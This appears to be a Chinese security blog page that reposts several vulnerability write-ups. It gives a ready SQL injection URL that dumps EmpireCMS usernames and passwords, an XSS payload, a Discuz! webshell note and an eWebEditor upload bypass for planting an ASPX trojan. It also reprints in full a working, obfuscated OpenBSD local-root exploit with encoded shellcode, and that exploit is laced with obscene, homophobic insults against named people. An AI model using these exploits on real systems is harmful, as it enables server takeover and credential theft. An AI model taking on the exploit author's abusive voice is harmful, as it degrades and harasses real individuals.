转载:
无意发现了一个很严重的漏洞,和当年3389 输入法漏洞相似。 不过暂时不影响未系统未加载搜狗输入法(未登录系统)。如果远程服务器装了 搜狗,登录系统后加载了搜狗,而又未及时注销或kill掉搜狗输入法直接关闭了远程连接,那么这些server 就很危险咯。
测试环境:
OS: windows 7 ultimate
搜狗输入法 4.3 正式版
漏洞过程描述: read more »
转载请保留版权,http://piao2010.com 谢谢!
WP-ShortStat是一个不错的WordPress访问统计插件,可以在WordPress的管理界面中显示简单的访问统计信息。
发现这个漏洞其实很意外,今天早上打开博客shortstat的时候突然弹出窗口,应该是alert/xss/造成的。难道被黑了?查看了一下源文件,发现<tr><td><a href=”http://www.google.cn/search?hl=zh-CN&q=%3Cimg+src%3D%22%23%22+onerror%3Dalert%28%2Fxss%2F%29%3E&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=” title=”/tags/xss/” rel=”nofollow”><img src=”#” onerror=alert(/xss/)></a></td>,打开链接发现是有人在Google中搜索<img src=”#” onerror=alert(/xss/)>关键词然后进入我的博客, read more »
author: ring04h
team:http://www.80vul.com
[该漏洞由ring04h发现并且投递,thx]
由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell. read more »
帝国ECMS /e/member/list/index.php文件:
if($sear)
{
$keyboard=RepPostVar2($_GET['keyboard']);
if($keyboard)
{
$add.=$where.$user_username.” like ‘%$keyboard%’”;
}
$search.=”&sear=1&keyboard=$keyboard”;
}
判断sear参数是否存在,然后直接去keyboard的参数,然后再判断keyboard值是否为空,如果不为空就直接把keyboard带入查询产生注射漏洞.
利用方法:
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9′+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
/* * [ A PRODUCTION OF LUL-DISLCOSURE INC. ] * PROUDLY PRESENTS... * * 888 888 * 888 888 * 888 888 * .d88b. 88888b. .d88b. 88888b. 88888b. .d8888b .d88888 * d88""88b 888 "88b d8P Y8b 888 "88b 888 "88b 88K d88" 888 * 888 888 888 888 88888888 888 888 888 888 "Y8888b. 888 888 * Y88..88P 888 d88P Y8b. 888 888 888 d88P X88 Y88b 888 * "Y88P" 88888P" "Y8888 888 888 88888P" 88888P' "Y88888 * 888 * 888 * 888 DID YOU EVER FEEL THE RUSH... * d8b d8b ...FOR JIZZ? * Y8P Y8P * * 8888 888 88888888 88888888 * "888 888 d88P d88P * 888 888 d88P d88P * 888 888 d88P d88P * 888 888 88888888 88888888 * 888 * d88P * 888P" * * My final contribution, DA WORLD'S FIRST ANIMATED EXPLOIT!, is the foundation * for the next generation of OpenBSD exploits, crafted to burn Theo's eyes and make * him spend countless hours not only exercising his supreme reversing skills * but also delay his already deadly slow patch release timing. Hopefully every * fucktard out there willing to release an exploit for one of the many OpenBSD * locally exploitable issues, will give this insanely advanced code a good use. * Make sure you include some sanity checks (ie. if uid == 0 and hostname == * cvs.openbsd.org make it do something creative like updating their index.html * once in a while). * * I would like to thank the following people for all the support, fun and * inspiration during my pilgrimage through the incredibly broken community known * as the security industry: * Jesus H. Christ, Brute Dong, Bob, GOBBLES, towlie, noir and spender. * * I could name several people that I would love to either curbstomp or rape * anally (enjoying every inch of their rectum, though many of them would enjoy * the experience too, i know you dig dicks guys!), but I'll be a nice kid and * simply say that I love how this hdm, jf, FAilja, et al are nothing but * cock monglers. I enjoy how some of them have lost their jobs or got banned * by US immigration. And I also thank McDonalds for making you fatfucks get more * obese and ugly every year. And I'm sorry for the poor strippers that have to * stand the reality of being the only thing ressembling a woman you've ever had * the opportunity to see naked, besides your crack head cock-gobbling mom when * she sodomized you with a chop stick (and we know you liked it). * Hehehehe. BANANA! BANANA! BANANA! BTW, has gadi evron stopped crying for cocks * on craigslist men seeking men board? That fat fuck is sick. LULZ! * * OpenBSD is obsolete, aged, poorly designed, worsly developed and horribly * maintained. And led by a guy who needs to take his head out of his frozen * Canadian ass. FUCK YOU THEO, I'VE GOT YOUR DARPA FUNDING! * * This exploit abuses an old bug to gain root privileges on an OpenBSD 4.0 * system. The ipv6 bug was never fully implemented because this shit made * me get a brain tumor. FUCK YOU THEO! LULZ LULZ LULZ LULZ LULZ LULZ LULZ * * -- 2008 - by LMH * */#include /*pax*/<string.h>/*drepper libc rocking on*//**//**//**//**//**//* */#include /*It seems to me so strange*/<stdlib.h>/*tax*//**//**//**//**//**//* */#include /*aint*/<stdio.h>/*mmap NULL rocking the kernel on*//**//**//**//**//**/#include /*Check wallet for her name*/<unistd.h>/*lax!*//**//**//**//**//**//**/#include /*Her face is in the muck*/<sys/param.h>/**//**//**//**//**//**//* * */#include /*Her face is in the muck*/<err.h>/**//**//**//**//**//**//**//**//* */#include /*I think her zippers stuck*/<sys/ioctl.h>/*death OPENBSD SECURE */#include /*It is perfect for me*/<sys/syscall.h>/*threats THANKS TO PAX */#include /*To practice surgery*/<fcntl.h>/**//**//* ######### BUY */#include /*One look coagulates*/<sys/types.h>/*mail ##horror## ### SPENDER */#include /*Its time to operate*/<sys/stat.h>/*arrives #sick### ### A NEW */#include /*Just keep it going*/<sys/mman.h>/*pain ###pain##### ### POSTER! */#include /*Just keep it going*/<sys/sysctl.h>/*feels ##dumb### ############*/#define /*Just keep it going*/ma main/*theo: ##feels########## ance M #######*/#define /*Shes not dead, shes gonna live*/s /*fuck*/stdout/*## Havok #######*/#define /*Shes not dead, shes gonna live*/x fflush/*the ######################*/#define /*I see her eyes rolling back in her head*/_s /*pain*/sleep/* GG NOIR */#define /*Come on lets take her home*/f for/**//**//**//**//**//**//**//**//* */#define /*I think i heard her groan*/v /*what*/void/**//**//**//**//**//**//* */#define /*Hold on or she will sink*/__0 while/**//**//**//**//**//**//**//* */#define /*Just keep it going*/_c /*is*/char/*acter issues*//**//**//**//**//* */#define /*You can fake it*/_____ sizeof/**//**//**//**//**//**//* *//**//* */#define /*It's time to operate*/____ /*the*/printf/**//**//**//**//**//**//* */#define /*It's time to operate*/___ return/**//**//**//**//**//**//* *//**//**/#define /*It's time to operate*/__ /*of*/int/**//**//**//**//**//**//**//**//**/#define /*It's time to operate*/_t static/**//**//**//**//**//**//**//**//* */#define /*It's time to operate*/_ki struct kinfo_proc/**//**//**//**//**//* */#define /*It's time to operate*/_pi pid_t/**//**//**//**//**//**//* *//**//**/#define /*It's time to operate*/______ unsigned int/**//**//**//**//**//**//* */#define /*It's time to operate*/_______ err/**//**//**//**//**//**//* *//* */#define /*It's time to operate*/__ki exit/**//**//**//**//**//**//* *//**//* */#define /*It's time to operate*/__sy sysctl/**//**//**//**//**//**//* *//* */#define /*Heroin winner cup.*/ctkrn (__)0x00000000/**//**//**//**//**//**//* */#define /*It's time to operate*/kproc (__)0x0000000E/**//**//**//**//**//**//**/#define /*Inject. Overdose. End.*/kppid (__)(/**/ctkrn+/**/0x00000001)/**//* */#define /*That cigar tube smells like lost elections*/dirtysanchez mmap/**//* */#define /*It's time to operate*/________/**/printf/**//**//**//**//**//**//* */#define /*It's time to operate*/_________/**/unsigned long/**//**//**//**//* */#define /*It's time to operate*/_m/**/memcpy/**//**//**//**//**//**//**//* */#define /*It's time to operate*/__________/**/setuid/**//**//**//**//**//**//**/#define /*It's time to operate*/___________/**/seteuid/**//**//**//**//**//* */#define /*It's time to operate*/____________/**/execl/**//**//**//**//**//* */#define aaaaaaaaaaaaaaaa O_RDWR#define ____rw_c_ (aaaaaaaaaaaaaaaa|O_CREAT)#define ____se_e_ (S_IRUSR|S_IWUSR)#define reopen close#define _w_w_w_w_w_w_w_w write#define meltwax PROT_READ|PROT_EXEC#define raadt MAP_FIXED#define openbsdsec MAP_FAILED#define molest syscall#define provos SYS_ioctl_c macaddr[]=""; // Used for ICMPv6 exploit: VMWare network interface mac addr/* many years... *Theo sheds a FREE tear* Sigh.===================================================================RCS file: /usr/OpenBSD/cvs/www/index.html,vretrieving revision 1.548retrieving revision 1.549diff -u -r1.548 -r1.549--- www/index.html 2007/03/12 17:21:59 1.548+++ www/index.html 2007/03/13 22:39:47 1.549@@ -78,7 +78,7 @@ <a href="art1.html"><img border="0" src="images/puffy40.gif" height=199 <br> <center><strong><font color="#e00000">-Only one remote hole in the default install, in more than 10 years!<br>+Only two remote holes in the default install, in more than 10 years!<br> </font></strong></center> <p> The OpenBSD project produces a <b>FREE</b>, multi-platform 4.4BSD-based*/_c shlr[]="\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\xc9""\\xd1\\xd1\\xd1\\xc9\\xd1\\xd1\\xd1\\x39\\xde\\xd1\\xd1\\xd1\\xa9\\x87\\xe5\\xc3\\x2f\\x1b\\x7c"//"\\x0f\\x7c\\x0f\\x3e\\x6f\\x41\\x41\\x41\\x8e\\x5a\\xde\\x5a\\x88\\xc1\\xe0\\x11\\x58\\x92\\xd5"//"\\x5a\\xc2\\x58\\x93\\xd5\\x69\\x80\\x96\\x99\\x01\\x2e\\x31\\xd1"; double obsdv;_________//mg1=0x21524110;_________ mg2=0xcc99e897;_________ mg3=0xffffffff;_________ mg4=0x12345678;_c shl[]="\\x85\\xc8\\xc3\\xc4\\x85\\xd9\\xc2\\xaa";v gpr(_pi dp,_ki *kp);///_c tks[]="\\x6e\\x35\\x2c\\x31\\x6e\\x35\\x29\\x24\\x2e\\x6f\\x19\\x19\\x19\\x19\\x19\\x41";_cgde[]="\\x00\\x4b\\x4a\\x59\\x00\\x5b\\x5b\\x56\\x6c\\x1f\\x2f";_t v evi(){_________ rts[2]={0xee5f9be,0xebdfc46};__ i,moo,moooo;v *p;_________ppa;_ki kp;rts[0]=rts[0]^(mg1^mg3);rts[1]=rts[1]^(mg2^mg4);gpr((_pi)getpid(),//&kp);ppa=(_________)kp.kp_eproc.e_paddr;shlr[24+5]=ppa&0xff;shlr[24+6]=(ppa>>8)&0xff;shlr[24+7]=(ppa>>16)&0xff;shlr[24+8]=(ppa>>24)&0xff;____("\\x5b\\x2b\\x5d\\x20""\\x53\\x68\\x65\\x6c\\x6c\\x63\\x6f\\x64\\x65\\x3a\\x20""%u bytes at %p\\x0a",(unsigned)//_____(shlr),&shlr);moo=mkstemp(tks);if(moo<0){_______(1,"\\x6f\\x70\\x65\\x6e");}_w_w_w_w_w_w_w_w(moo,shlr,_____(shlr));if((lseek(moo,0L,SEEK_SET))<0){_______(1,"\\x6c\\x73\\x65\\x65\\x6b");}p=dirtysanchez(0,_____(shlr),meltwax,raadt,moo,0);if(p==openbsdsec){_______(1,"\\x6d\\x6d\\x61\\x70");}moooo=open(gde,O_RDWR);if(moooo<0){munmap(p,_____(shlr));reopen(moo);_______(1,"\\x6f\\x70\\x65\\x6e");}molest(provos,moooo,0x80044103,NULL);reopen(moooo);reopen(moo);___________(0);__________(ctkrn);____________(shl,"sh",(v *)ctkrn);}double vobsd(){__ rg[2],l;_c *p;double re;rg[0]=CTL_KERN;rg[1]=KERN_OSRELEASE;if(__sy(rg,2,NULL,(size_t *)&l,NULL,0)==-1){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");}if((p=malloc(l))==NULL){_______(1,NULL);}if(__sy(rg,2,p,(size_t *)&l,NULL,0)==-1){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");}re=atof(p);____("\\x5b\\x2b\\x5d\\x20""\\x4f\\x70\\x65\\x6e\\x42\\x53\\x44\\x20\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x20\\x64\\x65\\x74""\\x65\\x63\\x74\\x65\\x64\\x3a\\x20""%s (%f)\\n",p,re);free(p);___ re;}v uss(){____(/**/"\\x4f\\x70\\x65\\x6e\\x42\\x53\\x44\\x3a\\x20\\x4f\\x6e\\x6c\\x79\\x20\\x73\\x65\\x63\\x75\\x72\\x65""\\x20\\x69\\x6e\\x20\\x73\\x69\\x6e\\x67\\x6c\\x65\\x20\\x75\\x73\\x65\\x72\\x20\\x65\\x6e\\x76\\x69""\\x72\\x6f\\x6e\\x6d\\x65\\x6e\\x74\\x73\\x20\\x66\\x6f\\x72\\x20\\x6d\\x6f\\x72\\x65\\x20\\x74\\x68""\\x61\\x6e\\x20\\x31\\x30\\x20\\x79\\x65\\x61\\x72\\x73\\x21\\x0a\\x0a\\x54\\x61\\x72\\x67\\x65\\x74""\\x20\\x76\\x75\\x6c\\x6e\\x65\\x72\\x61\\x62\\x69\\x6c\\x69\\x74\\x79\\x3a\\x0a\\x09\\x76\\x67\\x61""\\x3a\\x20\\x76\\x67\\x61\\x5f\\x69\\x6f\\x63\\x74\\x6c\\x28\\x29\\x20\\x6c\\x6f\\x63\\x61\\x6c\\x20""\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x20\\x20\\x28\\x34\\x2e\\x30\\x20\\x61\\x6e\\x64\\x20\\x33""\\x2e\\x39\\x20\\x67\\x65\\x6e\\x65\\x72\\x69\\x63\\x20\\x69\\x33\\x38\\x36\\x29\\x0a\\x09\\x69\\x70""\\x36\\x34\\x30\\x3a\\x20\\x49\\x43\\x4d\\x50\\x76\\x36\\x20\\x72\\x65\\x6d\\x6f\\x74\\x65\\x20\\x65""\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x20\\x20\\x20\\x20\\x28\\x34\\x2e\\x30\\x20\\x67\\x65\\x6e\\x65""\\x72\\x69\\x63\\x20\\x69\\x33\\x38\\x36\\x29\\x20\\x28\\x72\\x6f\\x6f\\x74\\x20\\x72\\x65\\x71\\x75""\\x69\\x72\\x65\\x64\\x21\\x29\\x0a\\x0a\\x44\\x61\\x72\\x65\\x20\\x79\\x6f\\x75\\x20\\x74\\x6f\\x20""\\x72\\x75\\x6e\\x20\\x74\\x68\\x69\\x73\\x20\\x65\\x78\\x70\\x6c\\x6f\\x69\\x74\\x20\\x61\\x73\\x20""\\x72\\x6f\\x6f\\x74\\x2e\\x20\\x4f\\x70\\x65\\x6e\\x42\\x53\\x0a\\x0a");__ki(-1);}v gpr(_pi dp,_ki *kp){__ rg[4],l;rg[0]=ctkrn;rg[1]=kproc;rg[2]=kppid;rg[3]=dp;l=_____(_ki);if(__sy(rg,4,kp,(size_t *)&l,NULL,0)<0){_______(1,"\\x73\\x79\\x73\\x63\\x74\\x6c");_______(1,"\\x43\\x6f\\x75\\x6c\\x64\\x20\\x6e\\x6f\\x74\\x20\\x72\\x65\\x74\\x72\\x69\\x65\\x76\\x65\\x20""\\x70\\x72\\x6f\\x63\\x20\\x73\\x74\\x72\\x75\\x63\\x74\\x75\\x72\\x65\\x21\\x0a");}}_t v xo(_cu[],______ l,__ k){______ i;f(i=0;i<l;i++){u[i]=u[i]^k;}}_t __ was=0;v pg(__ w,_c*rr[],__ nz,__ wsn){__ i,b;_c *u=0;__0(was<wsn){f(i= 0;i<nz;i++){u=rr[i];f(b=0;b<w;b++){____("\\b");}____("%s",u);x(s);_s(1);}was++;}____("\\n"/*A*/);/*{*/}/*r},v*/__ ma(__ a,_c **g){_c *theosmovie[]={"\\x53\\x75\\x63\\x6b\\x69\\x6e\\x67"/**//**//**/"\\x20\\x6f\\x6e\\x20\\x6d\\x79\\x20\\x74\\x69\\x74\\x74\\x69\\x65\\x73\\x20\\x6c\\x69\\x6b\\x65\\x20""\\x79\\x6f\\x75\\x20\\x77\\x61\\x6e\\x74\\x65\\x64\\x20\\x6d\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20","\\x43\\x61\\x6c\\x6c\\x69\\x6e\\x67\\x20\\x6d\\x65\\x2c\\x20\\x61\\x6c\\x6c""\\x20\\x74\\x68\\x65\\x20\\x74\\x69\\x6d\\x65\\x20\\x6c\\x69\\x6b\\x65\\x20\\x42\\x6c\\x6f\\x6e\\x64""\\x69\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x43\\x68\\x65""\\x63\\x6b\\x20\\x6f\\x75\\x74\\x20\\x6d\\x79\\x20\\x63\\x68\\x72\\x69\\x73\\x73\\x79\\x20\\x62\\x65""\\x68\\x69\\x6e\\x64\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x49\\x74\\x27\\x73\\x20\\x66\\x69\\x6e\\x65\\x20\\x61""\\x6c\\x6c\\x20\\x6f\\x66\\x20\\x74\\x68\\x65\\x20\\x74\\x69\\x6d\\x65\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x4c\\x69\\x6b\\x65\\x20\\x73\\x65\\x78\\x20\\x6f\\x6e\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x61\\x63""\\x68\\x65\\x73\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x57\\x68\\x61\\x74\\x20\\x65\\x6c\\x73""\\x65\\x20\\x69\\x73\\x20\\x69\\x6e\\x20\\x74\\x68\\x65\\x20\\x74\\x65\\x61\\x63\\x68\\x65\\x73\\x20""\\x6f\\x66\\x20\\x70\\x65\\x61\\x63\\x68\\x65\\x73\\x3f\\x20\\x48\\x75\\x68\\x3f\\x20\\x57\\x68\\x61""\\x74\\x3f\\x20","\\x48\\x75\\x68\\x3f\\x20\\x52\\x69\\x67\\x68\\x74\\x2e\\x20\\x57\\x68\\x61\\x74""\\x3f\\x20\\x55\\x68\\x68\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x48\\x75\\x68\\x3f""\\x20\\x52\\x69\\x67\\x68\\x74\\x2e\\x20\\x57\\x68\\x61\\x74\\x3f\\x20\\x55\\x68\\x68\\x3f\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x53\\x49\\x53\\x20\\x49\\x55\\x44\\x2c\\x20\\x73\\x74\\x61""\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75\\x73\\x65\\x20\\x69""\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x49\\x55\\x44\\x20\\x53\\x49\\x53\\x2c\\x20\\x73\\x74\\x61\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68""\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75\\x73\\x65\\x20\\x69\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20""\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20\\x20\\x20\\x20","\\x53\\x49\\x53\\x20\\x49\\x55\\x44\\x2c""\\x20\\x73\\x74\\x61\\x79\\x20\\x69\\x6e\\x20\\x73\\x63\\x68\\x6f\\x6f\\x6c\\x20\\x27\\x63\\x61\\x75""\\x73\\x65\\x20\\x69\\x74\\x27\\x73\\x20\\x74\\x68\\x65\\x20\\x62\\x65\\x73\\x74\\x20\\x20\\x20\\x20""\\x20\\x20\\x20","Fuck the pain away? Fuck the pain away!\\x20\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the pain away! Fuck the pain away?\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the 0day away. Fuck the pain away!""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the pain away! Fuck the"" pain away?\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20","Fuck the 0day aw""ay? Fuck the pain away!\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20"};____("\\033[2J\\x20\\x20\\x5f\\x5f\\x5f\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4f\\x70\\x65\\x6e\\x42\\x53""\\x44\\x20\\x4d\\x6f\\x76\\x69\\x65\\x20\\x62\\x79\\x20\\x54\\x68\\x65\\x6f\\x20\\x64\\x65\\x20\\x52""\\x61\\x61\\x64\\x74\\x0a\\x20\\x2f\\x2f\\x20\\x20\\x37\\x20\\x20\\x20\\x20\\x20\\x20\\x53\\x74\\x61""\\x72\\x72\\x69\\x6e\\x67\\x2e\\x2e\\x2e\\x0a\\x28\\x5f\\x2c\\x5f\\x2f\\x5c\\x20\\x20\\x20\\x20\\x20""\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2e\\x2e\\x2e\\x68\\x69\\x6d\\x73\\x65\\x6c\\x66\\x21\\x0a""\\x20\\x5c\\x20\\x20\\x20\\x20\\x5c\\x0a\\x20\\x20\\x5c\\x20\\x20\\x20\\x20\\x5c\\x20\\x20\\x20\\x20""\\x20\\x42\\x72\\x6f\\x75\\x67\\x68\\x74\\x20\\x74\\x6f\\x20\\x79\\x6f\\x75\\x20\\x62\\x79\\x2e\\x2e""\\x2e\\x0a\\x20\\x20\\x5f\\x5c\\x20\\x20\\x20\\x20\\x5c\\x5f\\x5f\\x0a\\x20\\x28\\x20\\x20\\x5c\\x20""\\x20\\x20\\x20\\x20\\x20\\x29\\x20\\x20\\x20\\x20\\x20\\x54\\x68\\x65\\x6f\\x27\\x73\\x20\\x6c\\x6f""\\x73\\x74\\x20\\x44\\x41\\x52\\x50\\x41\\x20\\x66\\x75\\x6e\\x64\\x69\\x6e\\x67\\x0a\\x20\\x20\\x5c""\\x5f\\x5f\\x5f\\x5c\\x5f\\x5f\\x5f\\x2f\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x26""\\x20\\x50\\x65\\x61\\x63\\x68\\x65\\x73\\x2e\\x0a\\x0a");/* Fuck the 0day away. */ if(a<2){uss();}obsdv=vobsd();pg(80,theosmovie,_____(theosmovie)/_____(_c *),1);xo(shl,_____(shl),shl[_____(shl)]);xo(shlr,_____(shlr),0xd1);xo(tks,_____(tks),0x41);xo(gde,_____(gde), 0x2f);if(obsdv==4.0&&!strcmp(g[1],"vga")){evi();}/*That's it.*/___ 0;}/*Easy to fingerprint, eh?*/// milw0rm.com [2008-07-01]
转载请保留版权信息
}
当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮….
不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车
上传完毕了,看看返回的原代码…[鼠标右键点查看源文件]
parent.UploadError(’不允许上传此类型的文件!!’);
看来上传失败了…做了过滤,限制ASPX的文件上传了…..
继续回到前面,我们在地址后面打一个空格试试
parent.UploadSavedFinish(’20081232115126366.aspx ‘,’jackie.aspx ‘);history.back();
嘿嘿….绕过了限制……成功的上传了ASPX文件….
文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功…..
接下来,别再问我还能做什么了,我也不知道…..
总结:
1>
javascript:lbtnUpload.click(); 主语言为javascrypt,向当前页面的lbtnUpload发送一个单击事件…实际上也就相当于我们点了提交按钮,一样的….
2>
脚本里面限制了ASPX为后缀的文件不允许上传,再地址栏后加了一个空格(实际上加别的符号也行,例如 ‘ ),脚本获取到的文件名就为’aspx ‘,所以if xxx =’aspx’ then 这类型的判断语句就不好使了….修复方法为把不允许改为只允许……..
